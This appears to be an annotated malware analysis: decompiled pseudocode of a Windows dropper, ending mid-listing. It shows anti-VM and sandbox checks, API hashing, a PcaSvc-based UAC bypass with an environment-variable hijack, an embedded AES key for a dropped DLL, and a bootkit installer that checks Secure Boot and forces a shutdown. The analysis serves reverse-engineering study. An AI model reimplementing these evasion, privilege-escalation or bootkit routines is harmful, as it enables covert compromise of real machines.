BYTE *v6; // rax
BYTE *v7; // rax
BYTE *v8; // rax
int v10; // [rsp+30h] [rbp+8h] BYREF
v0 = 0;
v10 = 0;
SystemFirmwareTableInformation = GetSystemFirmwareTableInformation(0x52534D42u, 0, &v10, 0);
TableBuffer = SystemFirmwareTableInformation->TableBuffer;
if ( SystemFirmwareTableInformation && v10 >= 0 )
{
// QEMU
v3 = deobfuscate_bytes(byte_1400090B8, 5u, 1);
if ( buffer_contains(v3, 4u, TableBuffer, v10)
// qemu
|| (v4 = deobfuscate_bytes(byte_1400090C0, 5u, 1), buffer_contains(v4, 4u, TableBuffer, v10))
// VirtualBox
|| (v5 = deobfuscate_bytes(byte_1400090C8, 0xBu, 1), buffer_contains(v5, 0xAu, TableBuffer, v10))
// vbox
|| (v6 = deobfuscate_bytes(byte_1400090D4, 5u, 1), buffer_contains(v6, 4u, TableBuffer, v10))
// VBOX
|| (v7 = deobfuscate_bytes(byte_1400090DC, 5u, 1), buffer_contains(v7, 4u, TableBuffer, v10))
// VMware
|| (v8 = deobfuscate_bytes(byte_1400090E8, 7u, 1), buffer_contains(v8, 6u, TableBuffer, v10)) )
{
v0 = 1;
}
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, SystemFirmwareTableInformation);
}
return v0;
}
14、anti_sandbox_check_ACPI
__int64 anti_sandbox_check_ACPI()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v0 = 0;
v11 = 0;
SystemFirmwareTableInformation = GetSystemFirmwareTableInformation(0x41435049u, 0, (int *)&v11, 1);
TableBuffer = (ULONG *)SystemFirmwareTableInformation->TableBuffer;
if ( SystemFirmwareTableInformation )
{
if ( (v11 & 0x80000000) == 0 )
{
v3 = v11 >> 2;
if ( v11 >> 2 && v11 >= 4 )
{
if ( v3 )
{
v4 = v3;
do
{
v11 = 0;
v5 = GetSystemFirmwareTableInformation(0x41435049u, *TableBuffer, (int *)&v11, 0);
v6 = v5->TableBuffer;
if ( v5 && (v11 & 0x80000000) == 0 )
{
// BOCHS
v7 = deobfuscate_bytes(byte_14000909C, 6u, 1);
if ( buffer_contains(v7, 5u, v6, v11)
// BXPC
|| (v8 = deobfuscate_bytes(byte_1400090A4, 5u, 1), buffer_contains(v8, 4u, v6, v11))
// VMWARE
|| (v9 = deobfuscate_bytes(byte_1400090B0, 7u, 1), buffer_contains(v9, 6u, v6, v11)) )
{
v0 = 1;
}
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, v5);
}
++TableBuffer;
--v4;
}
while ( v4 );
}
}
else
{
v0 = 1;
}
}
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, SystemFirmwareTableInformation);
}
return v0;
}
7、anti_sandbox_check_mac_addr
__int64 __fastcall GetPhyMacAddress_1400062D4(PVOID OutputBuffer)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v1 = 0;
FileHandle = 0i64;
NetworkCards_1400072EC = GetNetworkCards_1400072EC();
Heap_14026B010 = 0i64;
InputBuffer = OID_802_3_PERMANENT_ADDRESS;
v5 = NetworkCards_1400072EC;
if ( NetworkCards_1400072EC )
{
v6 = NetworkCards_1400072EC + 6;
v7 = wcslen_1400058DC(NetworkCards_1400072EC + 6);
Heap_14026B010 = (wchar_t *)RtlAllocateHeap_14026B010(
NtCurrentPeb()->ProcessHeap,
8i64,
2i64 * (unsigned int)(v7 + 0xA));
if ( Heap_14026B010 )
{
// \Device\
v8 = deobfuscate_wstring(word_14000ACD0, 9u, 1);
v9 = wcslen_1400058DC(v6);
wcsncpy_0(Heap_14026B010, (const wchar_t *)(unsigned int)(v9 + 0xA), (size_t)v8);
v10 = wcslen_1400058DC(v6);
wcsncat(Heap_14026B010, (unsigned int)(v10 + 0xA), v6);
RtlInitUnicodeString_14026B000(v12, Heap_14026B010);
ObjectAttributes.RootDirectory = 0i64;
ObjectAttributes.Length = 0x30;
ObjectAttributes.Attributes = 0x40;
ObjectAttributes.ObjectName = (PUNICODE_STRING)v12;
*(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
if ( NtCreateFile(&FileHandle, 0xC0000000, &ObjectAttributes, &IoStatusBlock, 0i64, 0x80u, 1u, 1u, 0, 0i64, 0) >= 0
&& NtDeviceIoControlFile(
FileHandle,
0i64,
0i64,
0i64,
&IoStatusBlock,
IOCTL_NDIS_QUERY_GLOBAL_STATS,
&InputBuffer,
4u,
OutputBuffer,
6u) >= 0 )
{
v1 = 1;
}
}
}
if ( FileHandle )
NtClose(FileHandle);
if ( Heap_14026B010 )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, Heap_14026B010);
if ( v5 )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, v5);
return v1;
}
__int64 check_mac_addr()
{
unsigned int v0; // ebx
char Buf2; // [rsp+30h] [rbp+8h] BYREF
v0 = 0;
if ( (unsigned int)GetPhyMacAddress_1400062D4(&Buf2)
// 0x00, 0x16, 0x3E, // Xensource, Inc.
// 0x08, 0x00, 0x27, // PCS Systemtechnik CmbH (VirtualBox)
// 0x00, 0x05, 0x69, //VMWare, Inc.
// 0x00, 0x0C, 0x29, //VMWare, Inc.
// 0x00, 0x1C, 0x14, //VMWare, Inc.
// 0x00, 0x50, 0x56, //VMWare, Inc.
&& (!memcmp(dword_140009084, &Buf2, 3ui64)
|| !memcmp(&dword_140009084[1], &Buf2, 3ui64)
|| !memcmp(&dword_140009084[2], &Buf2, 3ui64)
|| !memcmp(&dword_140009084[3], &Buf2, 3ui64)
|| !memcmp(&dword_140009084[4], &Buf2, 3ui64)
|| !memcmp(&dword_140009084[5], &Buf2, 3ui64)) )
{
return 1;
}
return v0;
}
8、anti_sandbox_rdtsc
__int64 anti_sandbox_rdtsc()
{
unsigned int v0; // esi
__int64 v1; // rbp
__int64 v2; // r14
unsigned __int64 v3; // rdi
v0 = 0;
v1 = 0i64;
v2 = 20i64;
do
{
v3 = rdtsc_1400084CB();
_RAX = 0i64;
__asm { cpuid }
v1 += rdtsc_1400084CB() - v3;
--v2;
}
while ( v2 );
if ( (unsigned __int64)(v1 - 20) > 19999 )
return 1;
return v0;
}
init_other_imports
void __stdcall init_other_imports()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
dll_base = get_dll_base(0x8F7EE672, 0i64); // kernel32
v1 = deobfuscate_wstring(word_140009B48, 0xBu, 1);// L"user32.dll"
user32 = load_library_w(v1);
v3 = deobfuscate_wstring(word_140009B60, 0xDu, 1);// L"advapi32.dll"
advapi32 = load_library_w(v3);
v5 = deobfuscate_wstring(word_140009B80, 0xBu, 1);// L"Rpcrt4.dll"
Rpcrt4 = load_library_w(v5);
v7 = deobfuscate_wstring(word_140009B98, 0xBu, 1);// L"bcrypt.dll"
bcrypt = load_library_w(v7);
v9 = deobfuscate_wstring(word_140009BB0, 0xAu, 1);// L"ole32.dll"
ole32 = load_library_w(v9);
v11 = deobfuscate_wstring(word_140009BC8, 0xCu, 1);// L"Cabinet.dll"
Cabinet = load_library_w(v11);
CreateWindowExW_14026B1A8 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD, _DWORD, _DWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(user32, 0xC5541C78, 0);// <user32.CreateWindowExW>
ShutdownBlockReasonCreate_14026B1B0 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
user32,
0xED5632F7,
0);// <user32.ShutdownBlockReasonCreate>
ShutdownBlockReasonDestroy_14026B1B8 = (__int64 (*)(void))get_proc_address_by_hash(user32, 0x7B141D3Fu, 0);// <user32.ShutdownBlockReasonDestroy>
DestroyWindow_14026B1C0 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(user32, 0x770D386Au, 0);// <user32.DestroyWindow>
CloseHandle_14026B070 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(dll_base, 0x1B474400u, 0);// <kernel32.CloseHandle>
CreateProcessW_14026B068 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(dll_base, 0x86F5F9E4, 0);// <kernel32.CreateProcessW>
InitializeProcThreadAttributeList_14026B078 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(dll_base, 0xF944ACAA, 0);// <kernelbase.InitializeProcThreadAttributeList>
UpdateProcThreadAttribute_14026B088 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(dll_base, 0x42F1A393u, 0);// <kernelbase.UpdateProcThreadAttribute>
LoadAppInitDlls_14026B080 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(dll_base, 0x9208E3AF, 0);// <kernelbase.LoadAppInitDlls>
Sleep_14026B0E8 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(dll_base, 0xD8A41517, 0);// <kernel32.Sleep>
GetExitCodeProcess_14026B130 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
dll_base,
0x35FBCBCEu,
0);// <kernel32.GetExitCodeProcess>
MoveFileExW_14026B138 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
dll_base,
0x31B89377u,
0);// <kernel32.MoveFileExW>
OpenSCManagerW_14026B040 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0x32234D44u,
0);// <advapi32.OpenSCManagerW>
OpenServiceW_14026B048 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0x6D7B016Cu,
0);// <advapi32.OpenServiceW>
QueryServiceStatus_14026B050 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0x5D94963Fu,
0);// <advapi32.QueryServiceStatus>
StartServiceW_14026B058 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0x93A6E504,
0);// <advapi32.StartServiceW>
CloseServiceHandle_14026B060 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(advapi32, 0x1D16D465u, 0);// <advapi32.CloseServiceHandle>
GetUserNameW_14026B090 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(advapi32, 0xB89CDF4B, 0);// <advapi32.GetUserNameW>
ConvertSidToStringSidW_14026B098 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0x2313AF10u,
0);// <advapi32.ConvertSidToStringSidW>
LookupAccountNameW_14026B0A0 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(advapi32, 0x194DF59u, 0);// <advapi32.LookupAccountNameW>
CreateWellKnownSid_14026B0C8 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0xE4310935,
0);// <advapi32.CreateWellKnownSid>
LookupPrivilegeValueW_14026B140 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0x54B7B41Du,
0);// <advapi32.LookupPrivilegeValueW>
ConvertStringSecurityDescriptorToSecurityDescriptorW_14026B1C8 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(advapi32, 0x2D687ADAu, 0);// <advapi32.ConvertStringSecurityDescriptorToSecurityDescriptorW>
RpcStringBindingComposeW_14026B0A8 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
Rpcrt4,
0xDDFC7B14,
0);// <rpcrt4.RpcStringBindingComposeW>
RpcBindingFromStringBindingW_14026B0B0 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
Rpcrt4,
0x6FB559CDu,
0);// <rpcrt4.RpcBindingFromStringBindingW>
RpcStringFreeW_14026B0B8 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(Rpcrt4, 0x2BEEA5D5u, 0);// <rpcrt4.RpcStringFreeW>
RpcBindingSetOption_14026B0C0 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
Rpcrt4,
0x167CA437u,
0);// <rpcrt4.RpcBindingSetOption>
RpcBindingSetAuthInfoExW_14026B0D0 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(Rpcrt4, 0x82535EAC, 0);// <rpcrt4.RpcBindingSetAuthInfoExW>
RpcBindingFree_14026B0D8 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(Rpcrt4, 0x76625EECu, 0);// <rpcrt4.RpcBindingFree>
NdrClientCall2_14026B120 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD))get_proc_address_by_hash(Rpcrt4, 0xE4BA5B8D, 0);// <rpcrt4.NdrClientCall2>
NdrClientCall3_14026B128 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _QWORD, _QWORD, _QWORD, _DWORD))get_proc_address_by_hash(Rpcrt4, 0xE4BA5B8E, 0);// <rpcrt4.NdrClientCall3>
BCryptOpenAlgorithmProvider_14026B0F0 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
bcrypt,
0xC694168A,
0);// <bcrypt.BCryptOpenAlgorithmProvider>
BCryptSetProperty_14026B0F8 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _DWORD))get_proc_address_by_hash(
bcrypt,
0x2163244Bu,
0);// <bcrypt.BCryptSetProperty>
BCryptGenerateSymmetricKey_14026B100 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD))get_proc_address_by_hash(bcrypt, 0x5CD9DC29u, 0);// BCryptGenerateSymmetricKey
BCryptDecrypt_14026B108 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _QWORD, _DWORD, _QWORD, _DWORD))get_proc_address_by_hash(bcrypt, 0xC604BB01, 0);// BCryptDecrypt
BCryptDestroyKey_14026B110 = (__int64 (*)(void))get_proc_address_by_hash(bcrypt, 0xB241FED1, 0);// <bcrypt.BCryptDestroyKey>
BCryptCloseAlgorithmProvider_14026B118 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
bcrypt,
0x1ACC1354u,
0);// <bcrypt.BCryptCloseAlgorithmProvider>
BCryptGetProperty_14026B180 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _DWORD))get_proc_address_by_hash(bcrypt, 0x5239823Fu, 0);// <bcrypt.BCryptGetProperty>
BCryptGenRandom_14026B1A0 = (__int64)get_proc_address_by_hash(bcrypt, 0x3EC63647u, 0);// <bcrypt.BCryptGenRandom>
CoCreateInstance_14026B148 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
ole32,
0xF02EBA3D,
0);// <combase.CoCreateInstance>
CoInitializeEx_14026B150 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(ole32, 0x7AC5A5AFu, 0);// <combase.CoInitializeEx>
CoUninitialize_14026B158 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(ole32, 0x1F8B8AF5u, 0);// <combase.CoUninitialize>
CoInitializeSecurity_14026B1D0 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD, _QWORD, _DWORD, _QWORD))get_proc_address_by_hash(ole32, 0xA681A8DC, 0);// <combase.CoInitializeSecurity>
CoSetProxyBlanket_14026B1D8 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD, _QWORD, _DWORD))get_proc_address_by_hash(ole32, 0x66DF13EBu, 0);// <combase.CoSetProxyBlanket>
if ( stru_7FFE0000.NtMinorVersion + 0xA * stru_7FFE0000.NtMajorVersion > 61 )// >win7/server 2008 r2
{
CreateDecompressor_14026B188 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
Cabinet,
0xF1657E42,
0);// <cabinet.CreateDecompressor>
CloseDecompressor_14026B198 = (__int64 (*)(void))get_proc_address_by_hash(Cabinet, 0xA405939E, 0);// <cabinet.CloseDecompressor>
Decompress_14026B190 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
Cabinet,
0x632FDDE3u,
0);// Decompress
}
}
is_at_least_il_high
// SECURITY_MANDATORY_HIGH_RID
BOOL __stdcall is_at_least_il_high()
{
BOOL v0; // ebx
unsigned int v1; // esi
_QWORD *Heap_14026B010; // rdi
_BYTE *v3; // rax
ULONG v5; // [rsp+40h] [rbp+8h] BYREF
HANDLE Handle; // [rsp+48h] [rbp+10h] BYREF
v0 = 0;
v5 = 0;
v1 = 0;
Handle = (HANDLE)0xFFFFFFFFFFFFFFFFi64;
if ( NtOpenProcessToken((HANDLE)0xFFFFFFFFFFFFFFFFi64, 0x18u, &Handle) >= 0 )
{
NtQueryInformationToken(Handle, TokenIntegrityLevel, 0i64, 0, &v5);
Heap_14026B010 = (_QWORD *)RtlAllocateHeap_14026B010(NtCurrentPeb()->ProcessHeap, 8i64, v5);
if ( Heap_14026B010 )
{
if ( NtQueryInformationToken(Handle, TokenIntegrityLevel, Heap_14026B010, v5, &v5) >= 0 )
{
v3 = (_BYTE *)RtlSubAuthorityCountSid_14026B178(*Heap_14026B010);
v1 = *(_DWORD *)RtlSubAuthoritySid_14026B170(*Heap_14026B010, (unsigned __int8)(*v3 - 1));
}
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, Heap_14026B010);
}
}
if ( Handle )
NtClose(Handle);
LOBYTE(v0) = v1 >= (unsigned int)SECURITY_MANDATORY_HIGH_RID;
return v0;
}
do_uac_bypass
__int64 do_uac_bypass()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
ProcessParameters = NtCurrentPeb()->ProcessParameters;
CommandLine = ProcessParameters->CommandLine;
ImagePathName = ProcessParameters->ImagePathName;
sid_of_user = (WCHAR *)get_sid_of_user();
result = user_isnot_admin();
if ( sid_of_user )
{
if ( (_DWORD)result )
{
v3 = wcslen_1400058DC(sid_of_user);
v4 = wcscmp_s(sid_of_user, v3, CommandLine.Buffer, CommandLine.Length >> 1);
v5 = stru_7FFE0000.NtMinorVersion + 0xA * stru_7FFE0000.NtMajorVersion;
if ( v5 == 61 ) // win7
{
if ( v4 )
{
Sleep_14026B0E8(0x9C4i64);
return RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, sid_of_user);
}
isWin7 = 1;
}
else
{
if ( v5 <= 61 )
return RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, sid_of_user);
if ( v4 ) // do BiTriggerMain
{
trigger_pca_uac_bypass_maybe();
return RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, sid_of_user);
}
isWin7 = 0;
}
uacbypass_main_140004964(isWin7, &ImagePathName, sid_of_user);
}
return RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, sid_of_user);
}
return result;
}
NTSTATUS trigger_pca_uac_bypass_maybe()
{
NTSTATUS result; // eax
NTSTATUS v1; // edx
EVENT_DATA_DESCRIPTOR AE_LOG; // [rsp+20h] [rbp-50h] BYREF
EVENT_DESCRIPTOR MessageBoxEvent; // [rsp+30h] [rbp-40h] BYREF
EVENT_DATA_DESCRIPTOR AE_EVENT_DESCRIPTOR; // [rsp+40h] [rbp-30h] BYREF
int *v5; // [rsp+50h] [rbp-20h]
__int64 v6; // [rsp+58h] [rbp-18h]
__int64 v7; // [rsp+60h] [rbp-10h]
__int64 v8; // [rsp+68h] [rbp-8h]
int v9; // [rsp+80h] [rbp+10h] BYREF
*(_QWORD *)&AE_EVENT_DESCRIPTOR.Size = 4i64;
v9 = 0;
AE_EVENT_DESCRIPTOR.Ptr = (ULONGLONG)&v9;
v6 = 4i64;
v5 = &v9;
v7 = 0i64;
v8 = 0i64;
*(_DWORD *)&MessageBoxEvent.Id = 0x11001F46;
MessageBoxEvent.Keyword = 0x4000000000000100i64;
*(_DWORD *)&MessageBoxEvent.Level = 4;
AE_LOG.Ptr = 0x422D0661EEF54E71i64;
AE_LOG.Size = 0xFD82989A;
AE_LOG.Reserved = 0x20B84049;
result = ((__int64 (__fastcall *)(EVENT_DATA_DESCRIPTOR *, EVENT_DESCRIPTOR *, __int64, EVENT_DATA_DESCRIPTOR *))EtwEventWriteNoRegistration_14026B0E0)(
&AE_LOG,
&MessageBoxEvent,
3i64,
&AE_EVENT_DESCRIPTOR);
if ( !result )
{
MessageBoxEvent.Id = 0x1F48;
if ( (unsigned int)((__int64 (__fastcall *)(EVENT_DATA_DESCRIPTOR *, EVENT_DESCRIPTOR *, __int64, EVENT_DATA_DESCRIPTOR *))EtwEventWriteNoRegistration_14026B0E0)(
&AE_LOG,
&MessageBoxEvent,
3i64,
&AE_EVENT_DESCRIPTOR) )
v1 = 0xFFFFFFFF;
else
v1 = 0;
return NtTerminateProcess((HANDLE)0xFFFFFFFFFFFFFFFFi64, v1);
}
return result;
}
NTSTATUS __fastcall uacbypass_main_140004964(int isWin7, PUNICODE_STRING imagepath, WCHAR *sid)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v49 = 0x100;
v5 = 0;
pProxyInfo = 0i64;
v6 = 0i64;
v35 = 0;
v7 = 0i64;
EventHandle = 0i64;
FileHandle = 0i64;
regkey_hkcu = 0i64;
v38 = 0i64;
*(_OWORD *)Handle = 0i64;
memset_140001000(Count, 0, sizeof(Count));
memset_140001000(Source, 0, sizeof(Source));
memset_140001000(Destination, 0, sizeof(Destination));
Buffer = imagepath->Buffer;
Timeout.QuadPart = 0xFFFFFFFFF4143E00ui64;
do_appcompat_registry_stuff(isWin7, Buffer);
wcsncpy_path(Count, imagepath->Buffer, imagepath->Length >> 1);
v11 = CoInitializeEx_14026B150(0i64, 0xEi64);
if ( v11 >= 0
&& (unsigned int)Start_Service_PcaSvc_1400048A4()
&& (unsigned int)BiStopWdiTask_140004494()
&& (unsigned int)GetUserNameW_14026B090(Source, &v49) )
{
// \??\
v12 = deobfuscate_wstring(path_prefix_14000AA98, 5u, 1);
v13 = Destination;
v14 = (char *)v12 - (char *)Destination;
v15 = 0x118i64;
do
{
if ( v15 == 0xFFFFFFFF8000011Aui64 )
break;
v16 = *(wchar_t *)((char *)v13 + v14);
if ( !v16 )
break;
*v13++ = v16;
--v15;
}
while ( v15 );
v17 = v13 + 0xFFFFFFFF;
if ( v15 )
v17 = v13;
*v17 = 0;
wcsncat(Destination, 0x118ui64, Count);
// system32
v18 = deobfuscate_wstring(ws, 9u, 1);
wcsncat(Destination, 280ui64, v18);
// \BaseNamedObjects\
v19 = deobfuscate_wstring(word_14000AAC0, 0x13u, 1);
v20 = v47;
v21 = (char *)v19 - (char *)v47;
v22 = 0x122i64;
do
{
if ( v22 == 0xFFFFFFFF80000124ui64 )
break;
v23 = *(wchar_t *)((char *)v20 + v21);
if ( !v23 )
break;
*v20++ = v23;
--v22;
}
while ( v22 );
v24 = v20 + 0xFFFFFFFF;
if ( v22 )
v24 = v20;
*v24 = 0;
wcsncat(v47, 0x122ui64, (const wchar_t *)Source);
RtlInitUnicodeString_14026B000(&NewName, v47);
v41.Length = 0x30;
v41.RootDirectory = 0i64;
v41.Attributes = 0;
v41.ObjectName = &NewName;
*(_OWORD *)&v41.SecurityDescriptor = 0i64;
if ( NtCreateEvent(&EventHandle, 0x1F0003u, &v41, NotificationEvent, 0) >= 0 )
{
RtlInitUnicodeString_14026B000(&NewName, Destination);
ObjectAttributes.Length = 0x30;
ObjectAttributes.RootDirectory = 0i64;
ObjectAttributes.Attributes = 0x40;
ObjectAttributes.ObjectName = &NewName;
*(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
if ( NtCreateFile(&FileHandle, 0x120116u, &ObjectAttributes, &IoStatusBlock, 0i64, 2u, 1u, 3u, 1u, 0i64, 0) >= 0 )
{
// \pcadm.dll
v25 = deobfuscate_wstring(word_14000AAE8, 0xBu, 1);
wcsncat(Destination, 0x118ui64, v25);
// ixdlYf9TqA9VH5oLoD3ltBeGjKRhM8pu
v26 = deobfuscate_bytes(a1, 0x21u, 1);
v27 = aes_256_cbc_decrypt(pbInput, v26, 5136u, &pcbOutput);
v6 = v27;
if ( v27 )
{
if ( pcbOutput )
{
v5 = write_file(Destination, v27, pcbOutput);
if ( v5 )
{
Count[(unsigned int)wcslen_1400058DC(Count) - 1] = 0;
// \Environment
v28 = deobfuscate_wstring(word_14000AB28, 0xDu, 1);
// bypass windwos defender filter driver catching custom windir creation
regkey_hkcu = create_regkey_hkcu(v28);
if ( regkey_hkcu )
{
RtlInitUnicodeString_14026B000(&NewName, sid);
if ( NtRenameKey(regkey_hkcu, &NewName) >= 0 )
{
// windir
v29 = deobfuscate_wstring(ws_windir_14000AA68, 7u, 1);
RtlInitUnicodeString_14026B000(&NewName, v29);
v30 = wcslen_1400058DC(Count);
if ( NtSetValueKey(regkey_hkcu, &NewName, 0, 1u, Count, 2 * v30) >= 0 )
{
RtlInitUnicodeString_14026B000(&NewName, Source);
if ( NtSetValueKey(regkey_hkcu, &NewName, 0, 1u, imagepath->Buffer, imagepath->Length) >= 0 )
{
// Environment
v31 = deobfuscate_wstring(ws_Environment_14000AA78, 0xCu, 1);
RtlInitUnicodeString_14026B000(&NewName, v31);
if ( NtRenameKey(regkey_hkcu, &NewName) >= 0 )
{
if ( (unsigned int)create_proc_1400066A0(
(__int64)imagepath->Buffer,
(__int64)sid,
(__int64)Handle,
1) )
{
if ( (unsigned int)BiCreatePcaRpcBinding(&pProxyInfo) )
{
if ( isWin7 )
{
NtResumeThread(Handle[1], 0i64);
v7 = pProxyInfo;
if ( (unsigned int)NdrClientCall2_1400043D4(
(__int64)pProxyInfo,
(__int64)imagepath->Buffer,
1,
v38) )
goto LABEL_36;
}
else
{
v7 = pProxyInfo;
if ( (unsigned int)NdrClientCall3_140004404(
(_DWORD)pProxyInfo,
Handle[0],
1,
imagepath->Buffer,
(__int64)sid,
(__int64)Count,
0) )
goto LABEL_36;
NtResumeThread(Handle[1], 0i64);
NtWaitForSingleObject(Handle[0], 0, 0i64);
GetExitCodeProcess_14026B130(Handle[0], &v35);
}
NtWaitForSingleObject(EventHandle, 0, &Timeout);
}
else
{
v7 = pProxyInfo;
}
}
}
}
}
}
}
}
}
}
}
}
}
LABEL_36:
BiStopWdiTask_140004494();
if ( EventHandle )
NtClose(EventHandle);
if ( FileHandle )
NtClose(FileHandle);
if ( v5 )
delfile_140005360(Destination);
if ( regkey_hkcu )
delreg_14000529C((__int64)sid, (__int64)Source, regkey_hkcu);
if ( Handle[0] )
{
NtTerminateProcess(Handle[0], 0xFFFFFFFF);
CloseHandle_14026B070(Handle[0]);
}
if ( Handle[1] )
CloseHandle_14026B070(Handle[1]);
if ( v7 )
RpcBindingFree_14026B0D8(v7);
if ( v6 )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, v6);
if ( v11 >= 0 )
CoUninitialize_14026B158((unsigned int)v11);
return do_appcompat_registry_stuff(isWin7, imagepath->Buffer);
}
install_bootkit_main
__int64 install_bootkit_main()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v11 = 0;
v0 = 0;
ProcessParameters = NtCurrentPeb()->ProcessParameters;
v9.Data1 = 0x8BE4DF61;
*(_DWORD *)&v9.Data2 = 0x11D293CA;
*(_DWORD *)v9.Data4 = 0xE0000DAA;
*(_DWORD *)&v9.Data4[4] = 0x8C2B0398;
v12 = 4;
shutdown_prevention_window = create_shutdown_prevention_window();
// SeSystemEnvironmentPrivilege
SeSystemEnvironmentPrivilege = deobfuscate_wstring(word_14000A270, 0x1Du, 1);
if ( (unsigned int)obtain_privilege(SeSystemEnvironmentPrivilege) )
{
// SecureBoot
v4 = deobfuscate_wstring(word_14000A2B0, 0xBu, 1);
RtlInitUnicodeString_14026B000(&v10, v4);
v5 = NtQuerySystemEnvironmentValueEx(&v10, &v9, &v11, &v12, 0i64);
if ( v5 >= 0 && (!v11 || v11 == 1 && stru_7FFE0000.NtMinorVersion + 0xA * stru_7FFE0000.NtMajorVersion <= 61)
|| v5 == 0xC0000100 )
{
Secure_Boot = 0;
}
else
{
if ( v5 < 0 )
goto LABEL_11;
Secure_Boot = 1;
}
v0 = install_bootkit(Secure_Boot);
}
LABEL_11:
result = MoveFileExW_14026B138(ProcessParameters->ImagePathName.Buffer, 0i64, MOVEFILE_DELAY_UNTIL_REBOOT);//重启删除
if ( shutdown_prevention_window )
result = shutdown_blockreason_140005A6C(shutdown_prevention_window);
if ( v0 )
{
v8 = deobfuscate_wstring(word_14000A2C8, 0x14u, 1);
result = obtain_privilege(v8);
if ( (_DWORD)result )
{
Sleep_14026B0E8(0xEA60i64);
return NtShutdownSystem(1i64);
}
}
return result;
}
install_bootkit
